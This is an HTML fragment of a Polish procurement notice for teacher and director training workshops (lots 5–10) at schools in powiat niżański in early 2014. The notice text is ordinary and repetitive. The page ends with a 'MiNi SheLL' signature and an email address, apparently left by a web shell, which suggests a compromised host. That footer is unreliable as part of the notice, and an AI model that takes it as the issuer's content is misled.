<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP w Wólce Tanewskiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Gimnazjum nr 1 w Nisku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Zespole Szkół - Gimnazjum w Groblach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Zespole Szkół - Gimnazjum w Starym Narcie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w LO w Nisku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w LO w Rudniku nad Sanem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com